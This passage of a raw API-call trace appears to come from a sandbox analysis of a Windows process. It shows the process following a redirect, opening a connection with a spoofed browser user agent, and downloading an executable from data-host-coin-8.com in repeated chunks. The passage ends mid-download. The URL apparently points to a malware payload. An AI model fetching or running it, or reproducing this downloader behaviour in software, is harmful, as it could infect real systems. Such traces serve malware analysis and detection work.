Ptr=0x97d2350, Size=0x5000) returned 0x97d2350 [0203.111] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97d2396, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df668 | out: lpBuffer=0x97d2396*, lpdwNumberOfBytesRead=0x75df668*=0x0) returned 1 [0203.112] VirtualAlloc (lpAddress=0x0, dwSize=0x46, flAllocationType=0x3000, flProtect=0x4) returned 0x2660000 [0203.114] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2350) returned 1 [0203.114] WinHttpCloseHandle (hInternet=0x3eeadd0) returned 1 [0203.114] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80400) returned 0x10d [0203.114] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80400) returned 1 [0203.114] WinHttpCloseHandle (hInternet=0x3faa0e0) returned 1 [0203.114] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80330) returned 0x68 [0203.115] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80330) returned 1 [0203.115] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80310) returned 0x12 [0203.115] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80310) returned 1 [0203.115] WinHttpCloseHandle (hInternet=0x3ea9ba0) returned 1 [0203.115] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a801f0) returned 0x10c [0203.116] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a801f0) returned 1 [0203.116] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a800a0) returned 0x78 [0203.116] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a800a0) returned 1 [0203.116] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80120) returned 0xc7 [0203.116] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80120) returned 1 [0203.116] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x1008) returned 0x97d2350 [0203.116] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x1008) returned 0x97d3360 [0203.116] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x13) returned 0x9a800a0 [0203.116] lstrlenA (lpString="Location: http://data-host-coin-8.com/files/9718_1641769402_1919.exe") returned 68 [0203.117] lstrlenA (lpString="Location:") returned 9 [0203.117] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x50) returned 0x9a800c0 [0203.117] wsprintfA (in: param_1=0x9a800c0, param_2="%s" | out: param_1="http://data-host-coin-8.com/files/9718_1641769402_1919.exe") returned 58 [0203.117] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10c) returned 0x9a80120 [0203.117] lstrlenA (lpString="http://data-host-coin-8.com/files/9718_1641769402_1919.exe") returned 58 [0203.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a800c0, cbMultiByte=59, lpWideCharStr=0x9a80120, cchWideChar=118 | out: lpWideCharStr="http://data-host-coin-8.com/files/9718_1641769402_1919.exe") returned 59 [0203.117] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x75df428 | out: pProxyConfig=0x75df428) returned 1 [0203.150] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3ea9ba0 [0203.151] WinHttpCrackUrl (in: pwszUrl="http://data-host-coin-8.com/files/9718_1641769402_1919.exe", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x75df4e0 | out: lpUrlComponents=0x75df4e0) returned 1 [0203.151] WinHttpConnect (hSession=0x3ea9ba0, pswzServerName="data-host-coin-8.com", nServerPort=0x50, dwReserved=0x0) returned 0x3faa0e0 [0203.151] WinHttpOpenRequest (hConnect=0x3faa0e0, pwszVerb=0x0, pwszObjectName="/files/9718_1641769402_1919.exe", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x3eeadd0 [0203.151] WinHttpSendRequest (hRequest=0x3eeadd0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0203.375] WinHttpReceiveResponse (hRequest=0x3eeadd0, lpReserved=0x0) returned 1 [0203.376] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x2800) returned 0x97d4370 [0203.376] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97d4370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97d4370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.377] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x5000) returned 0x97d4370 [0203.377] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97d6b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97d6b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.450] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x7800) returned 0x97d4370 [0203.451] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97d9370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97d9370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.453] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0xa000) returned 0x97d4370 [0203.453] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97dbb70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97dbb70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.464] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0xc800) returned 0x97d4370 [0203.465] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97de370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97de370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.527] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0xf000) returned 0x97d4370 [0203.529] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97e0b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97e0b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.532] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x11800) returned 0x97d4370 [0203.532] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97e3370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97e3370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.534] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x14000) returned 0x97d4370 [0203.534] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97e5b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97e5b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.535] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x16800) returned 0x97d4370 [0203.535] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97e8370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97e8370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.540] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x19000) returned 0x97d4370 [0203.540] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97eab70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97eab70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.602] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x1b800) returned 0x97d4370 [0203.602] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97ed370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97ed370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.603] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x1e000) returned 0x97d4370 [0203.603] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97efb70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97efb70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.939] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x20800) returned 0x97d4370 [0203.940] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97f2370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97f2370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.940] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x23000) returned 0x97d4370 [0203.940] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97f4b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97f4b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.940] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x25800) returned 0x97d4370 [0203.941] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97f7370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97f7370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.941] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x28000) returned 0x97d4370 [0203.941] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97f9b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97f9b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.941] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x2a800) returned 0x97d4370 [0203.942] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97fc370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97fc370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.942] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x2d000) returned 0x97d4370 [0203.942] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97feb70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97feb70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.942] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x2f800) returned 0x97d4370 [0203.943] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9801370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9801370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.943] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x32000) returned 0x97d4370 [0203.943] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9803b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9803b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.943] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x34800) returned 0x97d4370 [0203.943] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9806370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9806370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.944] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x37000) returned 0x97d4370 [0203.944] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9808b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9808b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.944] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x39800) returned 0x97d4370 [0203.944] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x980b370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x980b370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.945] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x3c000) returned 0x97d4370 [0203.945] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x980db70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x980db70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.945] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x3e800) returned 0x97d4370 [0203.945] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9810370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9810370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.946] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x41000) returned 0x97d4370 [0203.946] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9812b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9812b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.946] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x43800) returned 0x97d4370 [0203.946] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9815370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9815370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.947] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x46000) returned 0x97d4370 [0203.947] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9817b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9817b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.947] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x48800) returned 0x97d4370 [0203.947] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x981a370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x981a370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.948] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x4b000) returned 0x97d4370 [0203.948] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x981cb70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x981cb70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0203.948] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x4d800) returned 0x97d4370 [0203.948] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x981f370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x981f370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.005] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x50000) returned 0x97d4370 [0204.006] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9821b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9821b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.007] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x52800) returned 0x97d4370 [0204.007] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9824370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9824370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.009] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x55000) returned 0x97d4370 [0204.009] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9826b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9826b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.011] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x57800) returned 0x97d4370 [0204.011] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9829370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9829370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.013] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x5a000) returned 0x97d4370 [0204.013] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x982bb70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x982bb70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.017] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x5c800) returned 0x97d4370 [0204.017] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x982e370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x982e370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.019] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x5f000) returned 0x97d4370 [0204.019] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9830b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9830b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.020] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x61800) returned 0x97d4370 [0204.020] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9833370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9833370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.023] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x64000) returned 0x97d4370 [0204.024] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9835b70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9835b70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.024] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x66800) returned 0x97d4370 [0204.024] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9838370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9838370*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.028] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x69000) returned 0x97d4370 [0204.029] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x983ab70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x983ab70*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.031] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x6b800) returned 0x9630080 [0204.037] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9699080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9699080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.038] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x6e000) returned 0x9630080 [0204.039] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x969b880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x969b880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.039] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x70800) returned 0x9630080 [0204.039] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x969e080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x969e080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.039] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x73000) returned 0x9630080 [0204.039] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96a0880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96a0880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.040] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x75800) returned 0x9630080 [0204.040] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96a3080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96a3080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.082] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x78000) returned 0x9630080 [0204.082] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96a5880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96a5880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.084] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x7a800) returned 0x9630080 [0204.084] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96a8080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96a8080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.088] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x7d000) returned 0x9630080 [0204.088] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96aa880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96aa880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.090] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x7f800) returned 0x9630080 [0204.090] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96ad080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96ad080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.093] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x82000) returned 0x9630080 [0204.093] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96af880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96af880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.095] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x84800) returned 0x9630080 [0204.095] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96b2080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96b2080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.098] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x87000) returned 0x9630080 [0204.098] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96b4880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96b4880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.101] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x89800) returned 0x9630080 [0204.101] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96b7080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96b7080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.102] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x8c000) returned 0x9630080 [0204.103] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96b9880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96b9880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.106] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x8e800) returned 0x9630080 [0204.106] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96bc080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96bc080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.111] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x91000) returned 0x9630080 [0204.111] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96be880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96be880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.112] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x93800) returned 0x9630080 [0204.113] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96c1080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96c1080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.113] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x96000) returned 0x9630080 [0204.113] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96c3880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96c3880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.114] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x98800) returned 0x9630080 [0204.114] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96c6080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96c6080*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.115] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9630080, Size=0x9b000) returned 0x9630080 [0204.115] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x96c8880, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x96c8880*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0204.155] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, 